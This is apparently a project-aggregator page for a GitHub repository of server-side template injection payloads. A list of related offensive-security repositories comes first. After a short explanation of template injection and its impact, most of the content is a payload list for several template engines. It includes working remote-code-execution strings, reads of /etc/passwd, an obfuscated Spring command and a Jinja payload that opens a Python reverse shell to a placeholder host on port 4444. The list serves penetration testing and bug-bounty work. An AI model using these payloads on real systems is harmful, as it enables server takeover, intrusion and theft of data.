payloadbox / Ssti Payloads
Licence: mit
๐ฏ Server Side Template Injection Payloads
Stars: โญ 150
Projects that are alternatives of or similar to Ssti Payloads
Sql Injection Payload List
๐ฏ SQL Injection Payload List
Stars: โญ 716 (+377.33%)
Mutual labels: payload, websecurity, payloads, injection, bugbounty
Xxe Injection Payload List
๐ฏ XML External Entity (XXE) Injection Payload List
Stars: โญ 304 (+102.67%)
Mutual labels: payload, websecurity, payloads, bugbounty
Xss Payload List
๐ฏ Cross Site Scripting ( XSS ) Vulnerability Payload List
Stars: โญ 2,617 (+1644.67%)
Mutual labels: payload, websecurity, payloads, bugbounty
Rfi Lfi Payload List
๐ฏ RFI/LFI Payload List
Stars: โญ 202 (+34.67%)
Mutual labels: payload, websecurity, payloads, bugbounty
Payloadsallthethings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Stars: โญ 32,909 (+21839.33%)
Mutual labels: payload, payloads, bugbounty
Command Injection Payload List
๐ฏ Command Injection Payload List
Stars: โญ 658 (+338.67%)
Mutual labels: payload, injection, bugbounty
Payloads
Payload Arsenal for Pentration Tester and Bug Bounty Hunters
Stars: โญ 421 (+180.67%)
Mutual labels: bugbounty, payload, payloads
Open Redirect Payload List
๐ฏ Open Redirect Payload List
Stars: โญ 214 (+42.67%)
Mutual labels: payload, websecurity, payloads
Intruderpayloads
A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.
Stars: โญ 2,779 (+1752.67%)
Mutual labels: payloads, injection, bugbounty
Pixload
Image Payload Creating/Injecting tools
Stars: โญ 586 (+290.67%)
Mutual labels: payloads, injection
Chimera
Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
Stars: โญ 463 (+208.67%)
Mutual labels: payload, payloads
Allaboutbugbounty
All about bug bounty (bypasses, payloads, and etc)
Stars: โญ 758 (+405.33%)
Mutual labels: payloads, bugbounty
Dictionary Of Pentesting
Dictionary collection project such as Pentesing, Fuzzing, Bruteforce and BugBounty. ๆธ้ๆต่ฏใSRCๆผๆดๆๆใ็็ ดใFuzzing็ญๅญๅ
ธๆถ้้กน็ฎใ
Stars: โญ 492 (+228%)
Mutual labels: websecurity, bugbounty
Holisticinfosec For Webdevelopers Fascicle0
๐ Overview ๐ Tooling ๐ Process ๐ Physical ๐ People ๐
Stars: โญ 37 (-75.33%)
Mutual labels: security-audit, websecurity
Tiny Xss Payloads
A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me
Stars: โญ 975 (+550%)
Mutual labels: payloads, bugbounty
Tomb5
Tomb Raider: Chronicles Disassembly translated to C source code.
Stars: โญ 397 (+164.67%)
Mutual labels: source, code
Vhostscan
A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
Stars: โญ 767 (+411.33%)
Mutual labels: security-audit, bugbounty
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: โญ 1,022 (+581.33%)
Mutual labels: payload, bugbounty
Resources
A Storehouse of resources related to Bug Bounty Hunting collected from different sources. Latest guides, tools, methodology, platforms tips, and tricks curated by us.
Stars: โญ 62 (-58.67%)
Mutual labels: security-audit, bugbounty
Server Side Template Injection Payloads
Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.
Impact :
Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the backend server and using it to perform other attacks on internal infrastructure.
Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.
Payloads :
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}}
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
References :
- ๐ https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection
- ๐ https://portswigger.net/research/server-side-template-injection
- ๐ https://www.indusface.com/learning/application-security/server-side-template-injection/
Cloning an Existing Repository ( Clone with HTTPS )
[email protected]:~# git clone https://github.com/payloadbox/ssti-payloads.git
Cloning an Existing Repository ( Clone with SSH )
[email protected]:payloadbox/ssti-payloads.git
Donate!
Support the authors:
LiberaPay:
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].